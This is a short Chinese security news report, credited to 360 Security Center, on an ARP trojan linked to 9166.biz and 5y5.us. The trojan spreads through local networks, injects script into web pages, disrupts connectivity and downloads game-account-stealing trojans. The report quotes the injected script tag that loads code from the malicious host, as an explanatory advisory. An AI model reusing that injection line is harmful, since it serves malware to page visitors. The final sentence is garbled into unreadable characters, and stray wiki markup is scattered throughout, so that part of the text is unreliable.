恶性ARP木马,一人中招全网感染
[[wiki]wiki[/wiki]][/wiki][wiki]新闻[/wiki]来源:360[wiki]安全[/wiki]中心
一台[wiki]电脑[/wiki]中招,整网均被感染。目前名为9166.biz / 5y5.us Arp的木马病毒正在四处蔓延开来。
近日,360安全中心接到大量用户的举报,称全局域网的电脑中都出现了弹出5y5.us或9166.biz等网页,电脑被种植多个木马病毒,时常断网等现象。360安全中心的工程师随即对此进行了分析。
该木马的危害行为:
1.通过网页漏洞传播:该病毒通过植入[wiki]网站[/wiki]上的一句JS脚本,导致有[wiki]XML[/wiki]等漏洞的机器中招,成为此ARP病毒的传播源
2.ARP攻击篡改局域网数据包,一台电脑中招,局域网内的所有用户均遭殃:该病毒在整个局域网用户上网的网页中增加"<script src=http://9166.biz/w.js></script>"等内容,从而使局域网内有XML漏洞的电脑同时感染此病毒。
3.查杀困难,整个[wiki]网络[/wiki]不时掉线:由于遭受攻击的局域网一般都是多台电脑感染,同时发起ARP攻击,因此整个局域网很不稳定,时常掉线甚至瘫痪。而且由于机器之间互相感染,因此彻底查杀及恢复非常困难。
4.后台下载多个热门游戏木马:该木马会自动到网上下载梦幻、征途、江湖、魔域、武林外传、奇迹世界、天龙八部、传奇世界、完美国际、风云、魔兽、江湖、QQ幻想等十多款网络游戏木马,偷窃用户游戏帐户。
据360安全中心专家分析,此ARP木马病毒已经导諿wiki]铝[/wiki]松习偻蛱ǖ缒愿腥荆蚋鼍钟蛲缙盗偬被尽
